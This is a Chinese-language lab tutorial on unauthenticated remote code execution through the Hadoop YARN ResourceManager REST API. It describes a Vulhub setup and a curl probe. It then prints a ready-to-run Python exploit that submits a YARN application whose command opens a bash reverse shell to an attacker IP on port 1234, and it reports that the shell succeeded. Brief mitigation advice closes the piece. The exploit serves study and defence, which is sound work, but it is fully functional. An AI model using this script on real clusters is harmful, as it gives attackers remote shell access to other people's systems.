Hadoop-YARN未授权访问

简介

Hadoop是一个由Apache的分布式系统基础架构，用户可开发分布式程序，充分利用集群的威力进行高速运算和存储，实现了一个分布式文件系统（Hadoop Distributed File System）。

其中HDFS组件有高容错性的特点，并且部署在低廉的（low-cost）硬件上即可提供高吞吐量（high throughput）来访问应用程序的数据。

Apache Yarn（Yet Another Resource Negotiator的缩写）是hadoop集群资源管理器系统，Yarn从hadoop 2引入，最初是为了改善MapReduce的实现，但是它具有通用性，同样执行其他分布式计算模式。

ApplicationMaster负责与scheduler协商合适的container，跟踪应用程序的状态，以及监控它们的进度，ApplicationMaster是协调集群中应用程序执行的进程。每个应用程序都有自己的ApplicationMaster，负责与ResourceManager协商资源（container）和NodeManager协同工作来执行和监控任务 。

当一个ApplicationMaster启动后，会周期性的向resourcemanager发送心跳报告来确认其健康和所需的资源情况，在建好的需求模型中，ApplicationMaster在发往resourcemanager中的心跳信息中封装偏好和限制，在随后的心跳中，ApplicationMaster会对收到集群中特定节点上绑定了一定的资源的container的租约，根据Resourcemanager发来的container，ApplicationMaster可以更新它的执行计划以适应资源不足或者过剩，container可以动态的分配和释放资源。

环境搭建

使用Vulhub进行搭建

浏览器访问http://ip:8088

漏洞探测

通过REST API提交任务执行申请新的application:

curl -v -X http://yourip:8088/ws/v1/cluster/apps/new-application

返回异常信息

漏洞利用

先以post请求访问/ws/v1/cluster/apps/new-application，获取application-id

application-id为application_1650423858134_0001

然后Post请求/ws/v1/cluster/apps,设置application-id和command命令，发送请求。

exp

import requests
target = 'http://192.168.211.132:8088/'#hodoop目标地址
lhost = '192.168.211.132' # 攻击方的IP地址

url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/1234 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)

反弹shell成功，执行命令。

防护建议

1.建议项目拥有者将暴露在公网的服务端口（8040,8042,8088,50060,50070等）屏蔽掉，或做白名单访问处理。

2.对Hadoop web Manager服务（8088）做访问身份认证处理，对接收的数据包进行认证。

3.修改默认端口，防止端口服务被批量利用。

打赏